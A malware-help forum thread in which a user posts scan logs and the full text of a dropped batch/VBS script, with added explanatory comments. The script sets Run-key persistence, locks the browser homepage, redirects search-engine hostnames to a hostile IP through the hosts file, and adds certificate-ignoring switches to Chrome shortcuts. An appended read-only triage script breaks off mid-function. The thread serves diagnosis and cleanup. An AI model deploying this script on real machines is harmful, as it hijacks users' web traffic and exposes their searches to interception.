Malware/rootkit connecting to external IP, help me please?

Status
Not open for further replies.

Tom Jones (New Member, thread author, Jan 22, 2015)
Hello everyone,

I'd like some help with what I think is some sort of malware/rootkit that has infected my PC.
I think I need to do a series of thorough scans, since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up an "Open file with" window right after I booted. I never clicked Open, and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64. I also did all scans with Malwarebytes, RogueKiller64 and Microsoft Essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with a filename "Adobe Speed Launcher", which I don't quite like, and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.

-I'm very confident that this is some sort of malware.
The reason is that this has never happened before, and there are 5 instances of said window when I just boot up. The other clue that this is not some legit program is that under the "Program/File" name I see MY first name, and that just can't be right.

-I've also found a "FILE" under C:\Users named "Tom" and I've attached it.
It looks super suspicious, I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it; nonetheless the results are here: https://www.virustotal.com/en/file/...47ece280c3a89f785c72d997/analysis/1421971881/
I proceeded to open it and it seems to be a text file with some code on it that I think is dead-on some sort of malware trying to connect to some IP address that's not even mine: 69.162.120.131


-Pasted RogueKiller report below; mbam log, FRST, Addition and OTL reports attached.

RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Tom Jones [Administrator]
Mode : Scan -- Date : 01/22/2015 11:25:29

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 4 ¤¤¤
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 2 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
[C:\Windows\System32\drivers\etc\hosts] ::1 localhost

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++
--- User ---
[MBR] 97ed83405a22741aa5222a22e681b176
[BSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++
--- User ---
[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c
[BSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )


============================================
RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log
RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log
RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log



Thank you!
 

Attachments

  • FRST.txt (34 KB)
  • Addition.txt (46.4 KB)
  • mbamlog.txt (1 KB)
  • Extras.Txt (71.2 KB)
  • OTL.Txt (52.4 KB)

Tom Jones (New Member, thread author, Jan 22, 2015)
UPDATE:

Now this is probably bad.

Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player", which I obviously have never installed since I hate that player.
The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt

I also scanned this with VirusTotal and these are the results: https://www.virustotal.com/en/file/...ac04edbcef6191f3bd778b65/analysis/1421975128/

Someone's gotta help me get rid of this stuff; apparently none of the tools I've used so far has detected anything...
 

argus (Former MalwareTips Staff, Verified, Apr 24, 2014)
Hello,

My name is Argus and I will be helping you with your computer problems.

Before we begin, please note the following:
  • I will be working on your malware issues; this may or may not solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms do not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something, don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.




Rules and policies

We won't support any piracy.
That being said, if any evidence of an illegal OS, software, cracks/keygens or anything else of the kind is revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!
The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result in closing your topic and withdrawing any assistance.



You need to exit MalwareBytes in your tray area. Right click and select Exit.


Download Malwarebytes Anti-Rootkit to your desktop.
  • Double-click the icon to start the tool.
  • It will ask you where to extract it, then it will start.
  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • Click in the introduction screen "next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
  • When the scan is finished and no malware has been found select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder and paste the content of the following files in your next reply:
    • "mbar-log-{date} (xx-xx-xx).txt"
    • "system-log.txt"


Fix with AdwCleaner

Please download AdwCleaner by Xplode and save the file to your desktop.

  • Right-click on the AdwCleaner icon and select Run as Administrator to start the tool.
  • Follow the prompts and click Scan.
  • When finished, please click Clean.
  • Upon completion, click Report. A log (AdwCleaner[S*].txt) will open.

Please include the contents of that file in your reply.



Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.
  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click Run after receipt of Windows Security Warning - Open File).
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content into your next reply.
 

Tom Jones (New Member, thread author, Jan 22, 2015)
Hello again and thank you for your swift reply.
Attached them all:

1. MBAR
2. AdwCleaner
3. FRST, Addition

For some reason uTorrent shows up somewhere even though I uninstalled it prior to the scans.
 

Attachments

  • mbar-log-2015-01-22 (21-07-22).txt (2.1 KB)
  • AdwCleaner[S0].txt (3.6 KB)
  • FRST.txt (33.4 KB)
  • Addition.txt (44.3 KB)

argus (Former MalwareTips Staff, Verified, Apr 24, 2014)
Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.

Download the attached fixlist.txt file and save it to the Desktop:

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click Run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.
 

Attachments

  • fixlist.txt (3.3 KB)

Tom Jones (New Member, thread author, Jan 22, 2015)
Hello again,

Here's the fixlog:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 19-01-2015
Ran by Tom Jones at 2015-01-23 13:47:36 Run:1
Running from C:\Users\Tom Jones\Downloads
Loaded Profiles: Tom Jones & (Available profiles: Tom Jones)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\MountPoints2: G - G:\bunnyust.exe
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\MountPoints2: {4e3c6581-3e0c-11e4-a241-c86000246db4} - F:\Startme.exe
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-265094073-1043058997-3425087786-1000 -> {E911E8E0-F152-4902-A452-372C2073BCEB} URL =
SearchScopes: HKU\S-1-5-21-265094073-1043058997-3425087786-1000 -> {F7AA63F3-AE9E-4E2E-BF1A-7DD143703456} URL = https://search.yahoo.com/yhs/search...ype=W3i_DS,221,0_0,Search,20140727,0,0,0,7743
FF Plugin-x32: @wolfram.com/Mathematica -> C:\Program Files (x86)\Common Files\Wolfram Research\Browser\8.0.4.2609412\npmathplugin.dll No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @spoon.net/Spoon Plugin 3.33 -> C:\Program Files (x86)\Spoon\3.33.8.485\npMozillaSpoonPlugin.dll No File
CHR StartupUrls: Default -> "https://search.yahoo.com/yhs/web?hs...=W3i_SP,221,0_0,StartPage,20140727,0,0,0,7743"
CHR Extension: (Auto Refresh Plus) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih [2014-01-16]
C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih
CHR HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\Chrome\Extension: [ljfhnpbhhmmhdamdbpmajlonoecdobln] - C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx [2012-11-30]
C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx
CHR HKLM-x32\...\Chrome\Extension: [eihhgekonheiliaidomffpplfhecmkag] - No Path
CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - C:\Users\Tom Jones\AppData\Roaming\LastPass\lpchrome.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [ljfhnpbhhmmhdamdbpmajlonoecdobln] - C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx [2012-11-30]
C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx
S3 AFSLibrary; system32\DRIVERS\AFSRedirLib.sys [X]
S1 AFSRedirector; system32\DRIVERS\AFSRedir.sys [X]
S3 motmodem; system32\DRIVERS\motmodem.sys [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\ProgramData\hpe1289.dll
C:\ProgramData\hpe92DE.dll
C:\Users\Tom Jones\AppData\Roaming\uTorrent
emptytemp:

*****************

Processes closed successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F" => Key deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G" => Key deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4e3c6581-3e0c-11e4-a241-c86000246db4}" => Key deleted successfully.
HKCR\CLSID\{4e3c6581-3e0c-11e4-a241-c86000246db4} => Key not found.
C:\Windows\system32\GroupPolicy\Machine => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{E911E8E0-F152-4902-A452-372C2073BCEB}" => Key deleted successfully.
HKCR\CLSID\{E911E8E0-F152-4902-A452-372C2073BCEB} => Key not found.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F7AA63F3-AE9E-4E2E-BF1A-7DD143703456}" => Key deleted successfully.
HKCR\CLSID\{F7AA63F3-AE9E-4E2E-BF1A-7DD143703456} => Key not found.
"HKLM\Software\Wow6432Node\MozillaPlugins\@wolfram.com/Mathematica" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0" => Key deleted successfully.
C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll => Moved successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@spoon.net/Spoon Plugin 3.33" => Key deleted successfully.
Chrome StartupUrls deleted successfully.
C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih directory not found.
"C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih" => File/Directory not found.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Google\Chrome\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln" => Key deleted successfully.
"C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx" => File/Directory not found.
"C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx" => File/Directory not found.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eihhgekonheiliaidomffpplfhecmkag" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\hdokiejnpimakedhajhdlcegeplioahd" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln" => Key deleted successfully.
"C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx" => File/Directory not found.
"C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx" => File/Directory not found.
AFSLibrary => Service deleted successfully.
AFSRedirector => Service deleted successfully.
motmodem => Service deleted successfully.
RimUsb => Service deleted successfully.
VGPU => Service deleted successfully.
C:\ProgramData\hpe1289.dll => Moved successfully.
C:\ProgramData\hpe92DE.dll => Moved successfully.
"C:\Users\Tom Jones\AppData\Roaming\uTorrent" => File/Directory not found.
EmptyTemp: => Removed 114.9 MB temporary data.


The system needed a reboot.

==== End of Fixlog 13:47:37 ====
 

Tom Jones (New Member, thread author, Jan 22, 2015)
Hello again,

Um, I'm not sure whether you read my first post, so specifically I am concerned regarding this portion:

-I've also found a "FILE" under C:\Users named "Tom" and I've attached it.
It looks super suspicious, I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it; nonetheless the results are here: https://www.virustotal.com/en/file/...47ece280c3a89f785c72d997/analysis/1421971881/
I proceeded to open it and it seems to be a text file with some code on it that I think is dead-on some sort of malware trying to connect to some IP address that's not even mine: 69.162.120.131


Can you take a look at this .txt file? It's still there but before deleting it I want to get a better understanding of what it's doing.
I attached it here.
 

Attachments

  • Tom.txt (7 KB)

argus (Former MalwareTips Staff, Verified, Apr 24, 2014)
Scan with Malwarebytes' Anti-Malware
Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Install the program and select Update.
  • Once updated, click the Settings tab, in the left panel choose Detection & Protection and tick Scan for rootkits.
  • Click the Scan tab, make sure Threat Scan is checked and click Scan Now.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • At the bottom click Export and choose Text file.
Save the file to your desktop and include its content in your next reply.
 

Tom Jones (New Member, thread author, Jan 22, 2015)
Does anyone around here have any clue what this script is doing?
-This was a file without an extension, found in C:\Users\
Please let me know even if you know a bit of it.

Code:
REM ==== Lines meant for %APPDATA%\Windaws.bat (batch) ====
REM Every line in this dump ends in "Jones\AppData\Roaming\<file>". That is apparently what is left of
REM the path C:\Users\Tom Jones\AppData\Roaming\<file> once the dropper wrote each line through an
REM unquoted redirect: the redirect stopped at the space, so the text landed in C:\Users\Tom and the
REM rest of the path was left dangling at the end of every line. The trailing token therefore tells
REM you which of the five files each line was destined for.
@echo off Jones\AppData\Roaming\Windaws.bat
REM Persistence: five HKCU Run values (appdat, appdat1..appdat4) that relaunch this batch file and the
REM four VBS scripts at every logon of this user.
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
REM Internet Explorer: set the start page, then lock it with the HomePage=1 policy so the
REM user cannot change it back through the Internet Options dialog.
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.bat
REM Firefox: locate the *.default profile and append homepage/new-tab prefs to its prefs.js.
cd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.bat
cd *.default Jones\AppData\Roaming\Windaws.bat
set buzaar=%cd% Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
set buzaar= Jones\AppData\Roaming\Windaws.bat
REM Hosts file: map every major search engine (and several search redirectors) to 69.162.120.131.
REM Each "find ... || echo ... >>" appends the entry only if it is not already present, so the
REM file does not grow on repeated runs. With www.google.com and friends resolving to that
REM address, every "homepage" set above lands on the attacker's server instead.
cd %windir% Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
' ==== Lines meant for Systm.vbs: rewrite the pinned-taskbar Chrome shortcut so it opens
' ==== http://www.google.com (now hijacked via the hosts file) with certificate errors ignored
' ==== and info bars suppressed. The shortcut's target still points at the real chrome.exe.
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
SET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
else Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
End If Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
End If 'uz Jones\AppData\Roaming\Systm.vbs
' ==== Lines meant for Sys33.vbs: the same for the pinned Firefox shortcut. As dumped, this part
' ==== is missing the else / inner End If / .save() that the Chrome version has.
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbs
End If 'ez Jones\AppData\Roaming\Sys33.vbs
' ==== Lines meant for Sys32.vbs and Macrosoft.vbs: open the desktop Firefox and Chrome shortcuts.
' ==== Only the CreateShortcut calls survived in this dump; the lines that would change them are absent.
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbs
End If 'oz Jones\AppData\Roaming\Sys32.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbs
End If 'az Jones\AppData\Roaming\Macrosoft.vbs
 
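The script above plants four kinds of artifact: hosts-file entries pointing search engines at 69.162.120.131, HKCU Run values that relaunch scripts from %APPDATA%, an IE HomePage policy lock, and browser shortcuts with extra command-line switches. The fixlog earlier in the thread also removed MountPoints2 autorun handlers for removable drives. Below is an added read-only triage script that checks a machine for all five; it is not from the thread and not one of the helper's tools, it deletes nothing, and it assumes PowerShell 3.0 or later run from an elevated prompt. The IP and the search-engine names are taken from the dropped batch file; the check names, output layout and the "review" thresholds are this example's own choices.

```powershell
# Added triage script (not from the thread). Read-only: reports the artifacts the
# dropped Windaws.bat / *.vbs files and the MountPoints2 autorun keys would leave,
# deletes nothing. Assumes PowerShell 3.0+ on Windows, run elevated.

$SuspectIp   = '69.162.120.131'   # the address the batch file writes into hosts
$SearchHosts = @('www.google.com', 'www.bing.com', 'search.yahoo.com', 'www.yahoo.com',
                 'www.aol.com', 'search.aol.com', 'www.ask.com', 'search.avg.com',
                 'search.comcast.net')   # subset of the names the batch file remaps

function Get-HostsHijack {
    # Any IPv4 hosts entry that maps a name to something other than loopback is
    # reported; a hit on $SuspectIp or on a search-engine name is called out.
    param([string]$Path = "$env:SystemRoot\System32\drivers\etc\hosts")
    foreach ($line in Get-Content -LiteralPath $Path) {
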